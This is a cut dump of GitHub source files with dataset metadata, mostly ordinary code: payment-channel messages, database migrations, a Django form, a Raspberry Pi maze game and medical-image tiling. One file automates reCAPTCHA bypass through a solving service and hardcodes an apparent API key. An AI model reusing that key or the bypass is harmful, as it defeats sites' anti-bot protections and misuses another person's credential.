`RequestMonitoring`.\n \"\"\"\n # Important: we don't write the signature to `.signature`\n data = self._data_to_sign()\n return signer.sign(data)\n\n\n@dataclass(repr=False, eq=False)\nclass RequestMonitoring(SignedMessage):\n \"\"\"Message to request channel watching from a monitoring service.\n Spec:\n https://raiden-network-specification.readthedocs.io/en/latest/monitoring_service.html\\\n#monitor-request\n \"\"\"\n\n balance_proof: SignedBlindedBalanceProof\n reward_amount: TokenAmount\n non_closing_signature: Optional[Signature] = None\n\n def __post_init__(self):\n if self.balance_proof is None:\n raise ValueError(\"no balance proof given\")\n\n if not isinstance(self.balance_proof, SignedBlindedBalanceProof):\n raise ValueError(\"onchain_balance_proof is not a SignedBlindedBalanceProof\")\n\n @classmethod\n def from_balance_proof_signed_state(\n cls, balance_proof: BalanceProofSignedState, reward_amount: TokenAmount\n ) -> \"RequestMonitoring\":\n if not isinstance(balance_proof, BalanceProofSignedState):\n raise ValueError(\n \"balance_proof is not an instance of the type BalanceProofSignedState\"\n )\n\n onchain_balance_proof = SignedBlindedBalanceProof.from_balance_proof_signed_state(\n balance_proof=balance_proof\n )\n # pylint: disable=unexpected-keyword-arg\n return cls(\n balance_proof=onchain_balance_proof,\n reward_amount=reward_amount,\n signature=EMPTY_SIGNATURE,\n )\n return cls(onchain_balance_proof=onchain_balance_proof, reward_amount=reward_amount)\n\n @property\n def reward_proof_signature(self) -> Optional[Signature]:\n return self.signature\n\n def _data_to_sign(self) -> bytes:\n \"\"\" Return the binary data to be/which was signed \"\"\"\n packed = pack_reward_proof(\n canonical_identifier=CanonicalIdentifier(\n chain_identifier=self.balance_proof.chain_id,\n token_network_address=self.balance_proof.token_network_address,\n channel_identifier=self.balance_proof.channel_identifier,\n ),\n reward_amount=self.reward_amount,\n nonce=self.balance_proof.nonce,\n )\n return packed\n\n def sign(self, signer: Signer):\n \"\"\"This method signs twice:\n - the `non_closing_signature` for the balance proof update\n - the `reward_proof_signature` for the monitoring request\n \"\"\"\n self.non_closing_signature = self.balance_proof._sign(signer)\n message_data = self._data_to_sign()\n self.signature = signer.sign(data=message_data)\n\n def packed(self) -> bytes:\n klass = messages.RequestMonitoring\n data = buffer_for(klass)\n packed = klass(data)\n self.pack(packed)\n return packed\n\n def pack(self, packed) -> None:\n if self.non_closing_signature is None:\n raise ValueError(\"non_closing_signature missing, did you forget to sign()?\")\n if self.reward_proof_signature is None:\n raise ValueError(\"reward_proof_signature missing, did you forget to sign()?\")\n packed.nonce = self.balance_proof.nonce\n packed.chain_id = self.balance_proof.chain_id\n packed.token_network_address = self.balance_proof.token_network_address\n packed.channel_identifier = self.balance_proof.channel_identifier\n packed.balance_hash = self.balance_proof.balance_hash\n packed.additional_hash = self.balance_proof.additional_hash\n packed.signature = self.balance_proof.signature\n packed.non_closing_signature = self.non_closing_signature\n packed.reward_amount = self.reward_amount\n packed.reward_proof_signature = self.reward_proof_signature\n\n @classmethod\n def unpack(cls, packed) -> \"RequestMonitoring\":\n onchain_balance_proof = SignedBlindedBalanceProof(\n nonce=packed.nonce,\n chain_id=packed.chain_id,\n token_network_address=packed.token_network_address,\n channel_identifier=packed.channel_identifier,\n balance_hash=packed.balance_hash,\n additional_hash=packed.additional_hash,\n signature=packed.signature,\n )\n # pylint: disable=unexpected-keyword-arg\n monitoring_request = cls(\n balance_proof=onchain_balance_proof,\n non_closing_signature=packed.non_closing_signature,\n reward_amount=packed.reward_amount,\n signature=packed.reward_proof_signature,\n )\n return monitoring_request\n\n def verify_request_monitoring(\n self, partner_address: Address, requesting_address: Address\n ) -> bool:\n \"\"\" One should only use this method to verify integrity and signatures of a\n RequestMonitoring message. \"\"\"\n if not self.non_closing_signature:\n return False\n\n balance_proof_data = pack_balance_proof(\n nonce=self.balance_proof.nonce,\n balance_hash=self.balance_proof.balance_hash,\n additional_hash=self.balance_proof.additional_hash,\n canonical_identifier=CanonicalIdentifier(\n chain_identifier=self.balance_proof.chain_id,\n token_network_address=self.balance_proof.token_network_address,\n channel_identifier=self.balance_proof.channel_identifier,\n ),\n )\n blinded_data = pack_balance_proof_update(\n nonce=self.balance_proof.nonce,\n balance_hash=self.balance_proof.balance_hash,\n additional_hash=self.balance_proof.additional_hash,\n canonical_identifier=CanonicalIdentifier(\n chain_identifier=self.balance_proof.chain_id,\n token_network_address=self.balance_proof.token_network_address,\n channel_identifier=self.balance_proof.channel_identifier,\n ),\n partner_signature=self.balance_proof.signature,\n )\n reward_proof_data = pack_reward_proof(\n canonical_identifier=CanonicalIdentifier(\n chain_identifier=self.balance_proof.chain_id,\n token_network_address=self.balance_proof.token_network_address,\n channel_identifier=self.balance_proof.channel_identifier,\n ),\n reward_amount=self.reward_amount,\n nonce=self.balance_proof.nonce,\n )\n reward_proof_signature = self.reward_proof_signature or EMPTY_SIGNATURE\n return (\n recover(balance_proof_data, self.balance_proof.signature) == partner_address\n and recover(blinded_data, self.non_closing_signature) == requesting_address\n and recover(reward_proof_data, reward_proof_signature) == requesting_address\n )\n\n\n@dataclass(repr=False, eq=False)\nclass UpdatePFS(SignedMessage):\n \"\"\" Message to inform a pathfinding service about a capacity change. \"\"\"\n\n canonical_identifier: CanonicalIdentifier\n updating_participant: Address\n other_participant: Address\n updating_nonce: Nonce\n other_nonce: Nonce\n updating_capacity: TokenAmount\n other_capacity: TokenAmount\n reveal_timeout: int\n mediation_fee: FeeAmount\n\n def __post_init__(self):\n if self.signature is None:\n self.signature = EMPTY_SIGNATURE\n\n @classmethod\n def from_channel_state(cls, channel_state: NettingChannelState) -> \"UpdatePFS\":\n # pylint: disable=unexpected-keyword-arg\n return cls(\n canonical_identifier=channel_state.canonical_identifier,\n updating_participant=channel_state.our_state.address,\n other_participant=channel_state.partner_state.address,\n updating_nonce=channel.get_current_nonce(channel_state.our_state),\n other_nonce=channel.get_current_nonce(channel_state.partner_state),\n updating_capacity=channel.get_distributable(\n sender=channel_state.our_state, receiver=channel_state.partner_state\n ),\n other_capacity=channel.get_distributable(\n sender=channel_state.partner_state, receiver=channel_state.our_state\n ),\n reveal_timeout=channel_state.reveal_timeout,\n mediation_fee=channel_state.mediation_fee,\n signature=EMPTY_SIGNATURE,\n )\n\n def packed(self) -> bytes:\n klass = messages.UpdatePFS\n data = buffer_for(klass)\n packed = klass(data)\n self.pack(packed)\n return packed\n\n def pack(self, packed) -> None:\n packed.chain_id = self.canonical_identifier.chain_identifier\n packed.token_network_address = self.canonical_identifier.token_network_address\n packed.channel_identifier = self.canonical_identifier.channel_identifier\n packed.updating_participant = self.updating_participant\n packed.other_participant = self.other_participant\n packed.updating_nonce = self.updating_nonce\n packed.other_nonce = self.other_nonce\n packed.updating_capacity = self.updating_capacity\n packed.other_capacity = self.other_capacity\n packed.reveal_timeout = self.reveal_timeout\n packed.fee = self.mediation_fee\n packed.signature = self.signature\n\n @classmethod\n def unpack(cls, packed) -> \"UpdatePFS\":\n # pylint: disable=unexpected-keyword-arg\n return cls(\n canonical_identifier=CanonicalIdentifier(\n chain_identifier=packed.chain_id,\n token_network_address=packed.token_network_address,\n channel_identifier=packed.channel_identifier,\n ),\n updating_participant=packed.updating_participant,\n other_participant=packed.other_participant,\n updating_nonce=packed.updating_nonce,\n other_nonce=packed.other_nonce,\n updating_capacity=packed.other_capacity,\n other_capacity=packed.other_capacity,\n reveal_timeout=packed.reveal_timeout,\n mediation_fee=packed.fee,\n signature=packed.signature,\n )\n\n\ndef lockedtransfersigned_from_message(message: LockedTransfer) -> \"LockedTransferSignedState\":\n \"\"\" Create LockedTransferSignedState from a LockedTransfer message. \"\"\"\n balance_proof = balanceproof_from_envelope(message)\n\n lock = HashTimeLockState(message.lock.amount, message.lock.expiration, message.lock.secrethash)\n\n transfer_state = LockedTransferSignedState(\n message.message_identifier,\n message.payment_identifier,\n message.token,\n balance_proof,\n lock,\n message.initiator,\n message.target,\n )\n\n return transfer_state\n\n\nCMDID_TO_CLASS: Dict[int, Type[Message]] = {\n messages.DELIVERED: Delivered,\n messages.LOCKEDTRANSFER: LockedTransfer,\n messages.PING: Ping,\n messages.PONG: Pong,\n messages.PROCESSED: Processed,\n messages.REFUNDTRANSFER: RefundTransfer,\n messages.REVEALSECRET: RevealSecret,\n messages.UNLOCK: Unlock,\n messages.SECRETREQUEST: SecretRequest,\n messages.LOCKEXPIRED: LockExpired,\n messages.TODEVICE: ToDevice,\n}\n\nCLASSNAME_TO_CLASS = {klass.__name__: klass for klass in CMDID_TO_CLASS.values()}\nCLASSNAME_TO_CLASS[\"Secret\"] = Unlock\n","repo_name":"hoonkii/raiden","sub_path":"raiden/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":47449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"11370402676","text":"def generapares(limite):\n\n\tnum=1\n\n\tmiLista=[]\n\n\twhile num None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index('ix_products_id', table_name='products')\n op.drop_table('products')\n op.drop_index('ix_keys_id', table_name='keys')\n op.drop_table('keys')\n op.drop_index('ix_person_id', table_name='person')\n op.create_index(op.f('ix_person_id'), 'person', ['id'], unique=True)\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_person_id'), table_name='person')\n op.create_index('ix_person_id', 'person', ['id'], unique=False)\n op.create_table('keys',\n sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False),\n sa.Column('code', sa.VARCHAR(), autoincrement=False, nullable=False),\n sa.Column('created_at', postgresql.TIMESTAMP(), autoincrement=False, nullable=True),\n sa.Column('price', sa.INTEGER(), autoincrement=False, nullable=False),\n sa.PrimaryKeyConstraint('id', name='keys_pkey')\n )\n op.create_index('ix_keys_id', 'keys', ['id'], unique=False)\n op.create_table('products',\n sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False),\n sa.Column('name', sa.VARCHAR(length=32), autoincrement=False, nullable=False),\n sa.PrimaryKeyConstraint('id', name='products_pkey')\n )\n op.create_index('ix_products_id', 'products', ['id'], unique=False)\n # ### end Alembic commands ###\n","repo_name":"Andemir-programing/python6_FAST_API_PostgreSQL-","sub_path":"alembic/versions/891bb6bab2f7_del_tables_keys_and_product.py","file_name":"891bb6bab2f7_del_tables_keys_and_product.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71099145129","text":"from django import forms\nfrom .models import Product, Category\nfrom .widgets import CustomClearableFileInput\n\n\nclass ProductForm(forms.ModelForm):\n class Meta:\n model = Product\n # To include all fields\n fields = ('image', 'product_name', 'category', 'price', 'overall_rating', 'brand_name', 'product_description',\n 'exclusive')\n # fields = '__all__'\n\n image = forms.ImageField(label='Image',\n required=False,\n widget=CustomClearableFileInput)\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n categories = Category.objects.all()\n friendly_names = [(c.id, c.get_friendly_name()) for c in categories]\n # friendly_names.insert(0, (0, 'Category *'))\n\n self.fields['category'].choices = friendly_names\n\n for field_name, field in self.fields.items():\n # if field_name == 'category':\n # field.label = False\n # field.widget.attrs['class'] = 'grey-text'\n if field.required:\n field.label = f'{field.label} *'\n if field_name == 'product_description':\n field.widget.attrs['data-length'] = '120'\n","repo_name":"ArloysMacias/fitness4you","sub_path":"products/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30542471095","text":"from sense_hat import SenseHat\nfrom time import sleep\nimport time\nfrom datetime import datetime\nnow = datetime.now()\ncurrent_time = now.strftime(\"%H:%M:%S\")\nfrom stopwatch import Stopwatch\nstopwatch = Stopwatch()\n\nfrom importlib import reload \n\nsense = SenseHat()\nsense.clear()\n\nr = (255,0,0)\nb = (0,0,0)\nw = (255,255,255)\ng = (0, 255, 0)\n\nx = 1\ny = 1\n\nstopwatch.restart()\n\nmaze = [[r,r,r,r,r,r,r,r],\n [r,b,b,b,b,b,b,r],\n [r,r,r,r,r,b,b,r],\n [r,b,b,b,r,r,b,r],\n [r,b,r,b,b,b,b,r],\n [r,b,r,r,r,r,r,r],\n [r,b,b,b,b,b,g,r],\n [r,r,r,r,r,r,r,r]]\n\ndef move_marble(pitch, roll, x, y):\n new_x = x\n new_y = y\n if 1 < pitch < 179 and x != 0:\n new_x -= 1\n elif 359 > pitch > 181 and x != 7:\n new_x += 1\n if 1 < roll < 179 and y != 7:\n new_y += 1\n elif 359 > roll > 179 and y != 0:\n new_y -= 1\n new_x, new_y = check_wall(x,y,new_x,new_y)\n return new_x, new_y\n\ndef check_wall(x,y,new_x,new_y):\n if maze[new_y][new_x] != r:\n return new_x, new_y\n elif maze[new_y][x] != r:\n return x, new_y\n elif maze[y][new_x] != r:\n return new_x, y\n else:\n return x,y\n\ndef restart():\n import sys\n #print(\"argv was\",sys.argv)\n #print(\"sys.executable was\", sys.executable)\n print(\"restart now\")\n import os\n os.execv(sys.executable, ['python'] + sys.argv)\n\ngame_over = 1\nwhile game_over == 1:\n o = sense.get_orientation()\n pitch = o[\"pitch\"]\n roll = o[\"roll\"]\n x,y = move_marble(pitch,roll,x,y)\n if maze[y][x] == g:\n sense.show_message(\"win\")\n stopwatch.stop()\n score = stopwatch.duration\n score = round(score, 1)\n sense.show_message(\"score\")\n sense.show_message(str(score))\n #send score to database\n #exit()\n game_over = 2\n maze[y][x] = w\n sense.set_pixels(sum(maze,[]))\n sleep(0.1)\n maze[y][x] = b\nwhile game_over == 2:\n #execfile('marble_maze_menu.py')\n exec(open(\"marble_maze_menu.py\").read())\n exit(1)","repo_name":"Ojansen/marble_maze","sub_path":"marble_maze_level_1.py","file_name":"marble_maze_level_1.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11019570182","text":"import torch\r\nimport torch.nn.functional as F\r\n\r\n\r\ndef SSAD_loss_function(all_prediction_x, all_prediction_w, all_prediction_score, all_prediction_label,\r\n batch_match_x, batch_match_w, batch_match_scores, batch_match_labels, device, config):\r\n # calc Loss\r\n pmask = torch.ge(batch_match_scores, 0.5).float()\r\n num_positive = torch.sum(pmask)\r\n # print('num_positive', num_positive)\r\n num_entries = all_prediction_x.shape[0] * all_prediction_x.shape[1]\r\n\r\n hmask = batch_match_scores < 0.5\r\n hmask = hmask & (all_prediction_score > 0.5)\r\n hmask = hmask.float()\r\n num_hard = torch.sum(hmask)\r\n\r\n r_negative = (config.negative_ratio - num_hard / num_positive) * num_positive / (\r\n num_entries - num_positive - num_hard)\r\n r_negative = torch.min(r_negative, torch.Tensor([1.0]).to(device))\r\n nmask = torch.rand(pmask.size()).to(device)\r\n nmask = nmask * (1. - pmask)\r\n nmask = nmask * (1. - hmask)\r\n nmask = torch.ge(nmask, 1. - r_negative).float()\r\n # print(r_negative, num_positive, num_hard, torch.sum(nmask))\r\n # class_loss\r\n weights = pmask + nmask + hmask\r\n all_prediction_label = all_prediction_label.transpose(1, 2).contiguous().view(-1, config.num_classes)\r\n batch_match_labels = batch_match_labels.view(-1)\r\n class_loss = F.cross_entropy(all_prediction_label, batch_match_labels, reduction='none')\r\n class_loss = torch.sum(class_loss * weights.view(-1)) / torch.sum(weights)\r\n # loc_loss\r\n weights = pmask\r\n tmp_anchors_xmin = all_prediction_x - all_prediction_w / 2\r\n tmp_anchors_xmax = all_prediction_x + all_prediction_w / 2\r\n tmp_match_xmin = batch_match_x - batch_match_w / 2\r\n tmp_match_xmax = batch_match_x + batch_match_w / 2\r\n\r\n loc_loss = F.smooth_l1_loss(tmp_anchors_xmin, tmp_match_xmin, reduction='none') + F.smooth_l1_loss(\r\n tmp_anchors_xmax, tmp_match_xmax, reduction='none')\r\n loc_loss = torch.sum(loc_loss * weights) / torch.sum(weights)\r\n\r\n # conf loss\r\n weights = pmask + nmask + hmask\r\n # match_scores is from jaccard_with_anchors\r\n conf_loss = F.smooth_l1_loss(all_prediction_score, batch_match_scores, reduction='none')\r\n conf_loss = torch.sum(conf_loss * weights) / torch.sum(weights)\r\n\r\n loss = class_loss + 10. * loc_loss + 10. * conf_loss\r\n loss_dict = {\"cost\": loss, \"class_loss\": class_loss,\r\n \"loc_loss\": loc_loss, \"overlap_loss\": conf_loss}\r\n return loss_dict\r\n","repo_name":"Rheelt/SSAD_pytorch","sub_path":"loss_function.py","file_name":"loss_function.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"17374818874","text":"from anticaptchaofficial.recaptchav2proxyless import *\n\ndef captchaSolver(link,chave_captcha):\n solver = recaptchaV2Proxyless()\n solver.set_verbose(1)\n solver.set_key('96c0546d6b117e6808ec6326fc98df0d')\n solver.set_website_url(link)\n solver.set_website_key(chave_captcha)\n\n resposta = solver.solve_and_return_solution()\n\n if(resposta != 0):\n return resposta\n else:\n print(solver.err_string)","repo_name":"MuriloLima00/Poc_Afya","sub_path":"poc_afya/AntiCaptcha.py","file_name":"AntiCaptcha.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70165712490","text":"import numpy as np, pandas as pd\r\nimport cv2,PIL,pyvips\r\nimport skimage.io as sk \r\nimport os,sys,glob,shutil,time,random,gc,warnings,logging,math, multiprocessing, argparse\r\nfrom datetime import timedelta\r\n\r\nfrom wsi import slide,filters,tiles,util\r\n\r\nSTART_TIME = time.time()\r\nlogging.basicConfig(level=logging.INFO)\r\nlogger = logging.getLogger()\r\n\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"--dir_input_tif\")\r\nparser.add_argument(\"--file_meta\")\r\nparser.add_argument(\"--dir_output\")\r\nargs = parser.parse_args()\r\n\r\nDIR_INPUT_TIF = args.dir_input_tif\r\nFILE_INPUT_CSV = args.file_meta#'data/train_metadata_eRORy1H.csv'\r\nDIR_OUTPUT_TILES = f'./workspace/tiles/{args.dir_output}/'# ./workspace/tiles/train/\r\n\r\nPAGE_IX_MULS = {1:16,2:8,3:4,4:2}\r\nDIR_OUTPUT = {}\r\nDIR_OUTPUT[48] = f'{DIR_OUTPUT_TILES}/48/'\r\nDIR_OUTPUT[64] = f'{DIR_OUTPUT_TILES}/64/'\r\n\r\nPAGES_TO_EXTRACT = {}\r\nPAGES_TO_EXTRACT[48] = [2,3,4]\r\nPAGES_TO_EXTRACT[64] = [2,3,4]\r\n\r\nfor page in PAGES_TO_EXTRACT[48]:\r\n os.makedirs(f'{DIR_OUTPUT[48]}/{page}',exist_ok=True)\r\n\r\nfor page in PAGES_TO_EXTRACT[64]:\r\n os.makedirs(f'{DIR_OUTPUT[64]}/{page}',exist_ok=True)\r\n\r\nslide.SRC_TRAIN_DIR = args.dir_input_tif\r\nRANDOM_STATE = 41\r\ndef fix_seed(seed):\r\n random.seed(seed)\r\n os.environ['PYTHONHASHSEED'] = str(seed)\r\n np.random.seed(seed)\r\nfix_seed(RANDOM_STATE)\r\n\r\nlogger.info('done initial setup')\r\n\r\ndef save_tiles_for_page(cur_page,name,image_path,df_tissue_tiles,dir_output,logger):\r\n patch_size = PATCH_SIZES_ACT[cur_page]\r\n slide = pyvips.Image.new_from_file(image_path, page=cur_page)\r\n RES_MUL = PAGE_IX_MULS[cur_page] #2**(base_page-cur_page)\r\n for idx, row in df_tissue_tiles.iterrows():\r\n if row.tile_id==MAX_TILES_PER_PAGE[cur_page]: ##generated maximum tiles for page, exit\r\n break\r\n y = row['Row Start']\r\n x = row['Col Start']\r\n\r\n if (y<0 or x<0):\r\n warnings.warn(f\"bad coords for {name} x:{x} y:{y}\", RuntimeWarning) \r\n \r\n \r\n x1 = max(0,x)*RES_MUL\r\n y1 = max(0,y)*RES_MUL\r\n \r\n region_width = region_height = patch_size#PATCH_SIZES_ACT[cur_page]\r\n if x1 + region_width >slide.width:\r\n logger.info(f'reducing {name} since {x1} + {region_width} >{slide.width}')\r\n region_width = slide.width - x1\r\n if y1 + region_height >slide.height:\r\n logger.info(f'reducing {name} since {y1} + {region_height} >{slide.height}')\r\n region_height = slide.height - y1\r\n try:\r\n #method 2\r\n region = pyvips.Region.new(slide).fetch(x1, y1, region_width, region_height)\r\n bands = 3\r\n img = np.ndarray(\r\n buffer=region,\r\n dtype=np.uint8,\r\n shape=(region_height, region_width, bands))\r\n \r\n img = PIL.Image.fromarray(img)\r\n img.save(f'{dir_output}/{cur_page}/{name}_{idx}.jpeg', quality=90)\r\n except Exception as ex:\r\n logger.info(f'Failed for {name}. x: {x}, y: {y} x1: {x1}, y1: {y1} reg_w: {region_width}, reg_h: {region_height} ')\r\n logger.info(f'slide width: {slide.width} height: {slide.height} cur_page: {cur_page}' )\r\n logger.info(f'exc: {ex}')\r\n logger.info(f\"{os.popen('df -h').read()}\")\r\n \r\n\r\ndef gen_tiles(DIR_INPUT_TIF,dir_output,df_tile_data,pages_to_extract):\r\n ix=-1\r\n for name,df in list(df_tile_data.groupby('tissue_id')):\r\n ix+=1\r\n logger.info(f'processing {ix}: {name}')\r\n image_path = f'{DIR_INPUT_TIF}/{name}.tif'\r\n df = df.sort_values(by='tile_id').reset_index(drop=True)\r\n for page in pages_to_extract:\r\n save_tiles_for_page(page,name,image_path,df,dir_output,logger)\r\n\r\n\r\ndef generate_tiles_for_slide_list(slide_names,dir_output,pages_to_extract):\r\n for slide_name in slide_names:\r\n # ##generate tiles\r\n df = pd.read_csv(f'{slide.TILE_DATA_DIR}/{slide_name}-tile_data.csv',skiprows=14).sort_values(by='Score',ascending=False).reset_index(drop=True)\r\n #filter scores\r\n df1 = df[df.Score>0]\r\n if len(df1)>=1:\r\n df = df1\r\n else:\r\n logger.info(f'Ignoring Score: {slide_name}')\r\n \r\n df['tile_id'] = df.index\r\n df['tissue_id'] = slide_name\r\n df['filename'] = df['tissue_id'] + '.tif'\r\n gen_tiles(DIR_INPUT_TIF,dir_output,df,pages_to_extract)\r\n \r\n\r\ndef multiprocess_generate_tiles(dir_output,pages_to_extract):\r\n slides_list = list(df_input.tissue_id.unique())\r\n num_slides = len(slides_list)\r\n\r\n num_processes = min(multiprocessing.cpu_count(),5)\r\n pool = multiprocessing.Pool(num_processes)\r\n\r\n if num_processes > num_slides:\r\n num_processes = num_slides\r\n slides_per_process = num_slides / num_processes\r\n\r\n tasks = []\r\n for num_process in range(1, num_processes + 1):\r\n start_index = (num_process - 1) * slides_per_process + 1\r\n end_index = num_process * slides_per_process\r\n start_index = int(start_index)\r\n end_index = int(end_index)\r\n sublist = slides_list[start_index - 1:end_index]\r\n tasks.append((sublist,dir_output,pages_to_extract))\r\n logger.info(f\"Task # {num_process} Process slides {sublist}\")\r\n \r\n # start tasks\r\n results = []\r\n for t in tasks:\r\n results.append(pool.apply_async(generate_tiles_for_slide_list, t))\r\n\r\n for result in results:\r\n _ = result.get()\r\n\r\ndf_input = pd.read_csv(FILE_INPUT_CSV)\r\ndf_input = df_input[df_input.filename.isin([f for f in os.listdir(DIR_INPUT_TIF) if f.split('.')[-1]=='tif'])].reset_index(drop=True)\r\ndf_input = df_input[['filename']]\r\ndf_input['tissue_id'] = df_input.filename.str.split('.').str[0].values\r\nlogger.info('loaded training file')\r\n\r\n\r\n##Generate tiles\r\nlogger.info('************** GENERATING MASKS *********************')\r\n\r\nNAMES = [n.split('.')[0] for n in df_input.filename.values]\r\ndf_submission = pd.DataFrame()\r\n\r\nn_files = len(NAMES)\r\nfilters.multiprocess_apply_filters_to_images(image_name_list=NAMES)\r\nelapsed = time.time() - START_TIME\r\nlogger.info(f'######### DONE GENERATING MASKS ######## TOTAL TIME: {timedelta(seconds=elapsed)}')\r\ngc.collect()\r\n\r\n##48\r\nBASE_SZ = 48\r\ntiles.TILE_SIZE_BASE = BASE_SZ\r\nslide.TILE_DATA_DIR = os.path.join(slide.BASE_DIR, f\"tile_data/{BASE_SZ}\")\r\nslide.TOP_TILES_DIR = os.path.join(slide.BASE_DIR, f\"top_tiles/{BASE_SZ}\")\r\n\r\nMAX_TILES_PER_PAGE = {1:24,2:48,3:96,4:128} #maximum number of tiles to extract per page\r\nPATCH_SIZES_ACT = {1:768,2:384,3:192,4:96}#patch size to extract for each page\r\n\r\nlogger.info(f'********* GENERATING TILE META {BASE_SZ} **********')\r\ntiles.multiprocess_filtered_images_to_tiles(image_list=NAMES, display=False, save_summary=False, save_data=True, save_top_tiles=False)\r\nelapsed = time.time() - START_TIME\r\nlogger.info(f'######### DONE GENERATING TILE META {BASE_SZ} ######## TOTAL TIME: {timedelta(seconds=elapsed)}')\r\ngc.collect()\r\n\r\nlogger.info(f'********* GENERATING TILES {BASE_SZ} **********')\r\n\r\nmultiprocess_generate_tiles(dir_output=DIR_OUTPUT[BASE_SZ],pages_to_extract=PAGES_TO_EXTRACT[BASE_SZ])\r\n\r\nelapsed = time.time() - START_TIME\r\nlogger.info(f'######### DONE GENERATING TILES {BASE_SZ} ######## TOTAL TIME: {timedelta(seconds=elapsed)}')\r\ngc.collect()\r\n\r\n##64\r\nBASE_SZ = 64\r\ntiles.TILE_SIZE_BASE = BASE_SZ\r\nslide.TILE_DATA_DIR = os.path.join(slide.BASE_DIR, f\"tile_data/{BASE_SZ}\")\r\nslide.TOP_TILES_DIR = os.path.join(slide.BASE_DIR, f\"top_tiles/{BASE_SZ}\")\r\n\r\nMAX_TILES_PER_PAGE = {2:48,3:64,4:128} #maximum number of tiles to extract per page\r\nPATCH_SIZES_ACT = {2:512,3:256,4:128}#patch size to extract for each page\r\n\r\nlogger.info(f'********* GENERATING TILE META {BASE_SZ} **********')\r\ntiles.multiprocess_filtered_images_to_tiles(image_list=NAMES, display=False, save_summary=False, save_data=True, save_top_tiles=False)\r\nelapsed = time.time() - START_TIME\r\nlogger.info(f'######### DONE GENERATING TILE META {BASE_SZ} ######## TOTAL TIME: {timedelta(seconds=elapsed)}')\r\ngc.collect()\r\n\r\nlogger.info(f'********* GENERATING TILES {BASE_SZ} **********')\r\n\r\nmultiprocess_generate_tiles(dir_output=DIR_OUTPUT[BASE_SZ],pages_to_extract=PAGES_TO_EXTRACT[BASE_SZ])\r\n\r\nelapsed = time.time() - START_TIME\r\nlogger.info(f'######### DONE GENERATING TILES {BASE_SZ} ######## TOTAL TIME: {timedelta(seconds=elapsed)}')\r\ngc.collect()\r\n","repo_name":"drivendataorg/tissuenet-cervical-biopsies","sub_path":"2nd Place/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":8299,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"18593189819","text":"# flake8: noqa\nfrom ward import test\n\nfrom turbo_chat import *\nfrom turbo_chat.utils.tokens import count_tokens, get_max_tokens_length\n\n\n@test(\"contains returns True when memory filter works\")\nasync def test_memory_filter():\n @turbo(memory_class=LocalTruncatedMemory)\n async def example(zodiac: str, memory):\n for _ in range(50_000):\n yield User(content=\"You are a fortune teller\" * 500)\n\n messages = await memory.prepare_prompt()\n num_tokens = count_tokens(messages, memory.model)\n assert num_tokens < get_max_tokens_length(memory.model)\n\n await example(zodiac=\"pisces\").run()\n","repo_name":"julep-ai/turbo-ai","sub_path":"tests/test_memory_filter.py","file_name":"test_memory_filter.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"74522037288","text":"import sys\n\nN = int(sys.stdin.readline())\n\npeople = []\n\nfor i in range(N):\n people.append(sys.stdin.readline().split())\n\nprint(people)\n\n\nfor i in range(N):\n rank = 1\n for ii in range(N):\n if people[i][0] < people[ii][0] and people[i][1] < people[ii][1]:\n rank = rank + 1\n print(rank, end=\" \")\n","repo_name":"silentcat21/BAEKJOON","sub_path":"브루트 포스/7568.py","file_name":"7568.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2656322475","text":"#estimate the \"real\" distribution of all arms\nimport random\nimport sys\nimport os \nimport getopt\nimport itertools\n\nfrom mako.template import Template\n\nargs = sys.argv[1:]\n\ndef get_arg(name):\n for arg in args:\n if arg.startswith(\"--\" + name):\n (name, value) = tuple(arg[2:].split(\"=\"))\n return value \n raise ValueError(\"Could not find argument named \" + name)\n\npath = get_arg(\"path\")\ntemplate_fn = get_arg(\"template_fn\") \nr0 = get_arg(\"r0\")\ndays = get_arg(\"days\")\ndatafile = get_arg(\"datafile\")\ndoses = get_arg(\"doses\")\n\nsamples = 1000\n\nrandom.seed(123)\nseeds = random.sample(range(1, 100000), samples)\n \narms = list(itertools.product('01', repeat=5))\nfor arm in arms:\n for seed in seeds:\n template_vars = {\n 'label': str(seed) + \"_\" + \"\".join(arm),\n 'seed': seed,\n 'vaccine_priorities': \",\".join(arm),\n 'R0': r0,\n 'run_length': days,\n 'data_file': datafile,\n 'doses': doses\n }\n flute_dir = path + \"/\" + \"\".join(arm) + \"/\" + str(seed) + \"/\"\n os.makedirs(flute_dir)\n t = Template(filename=template_fn, strict_undefined=True, \\\n default_filters=['decode.utf8'], \\\n input_encoding='utf-8', \\\n output_encoding='utf-8')\n r = t.render(**template_vars)\n f = open(flute_dir + 'flute.config', 'w')\n f.write(r)\n","repo_name":"plibin/flute","sub_path":"configs/bandits/pre-vaccination.real.py","file_name":"pre-vaccination.real.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32617488787","text":"import 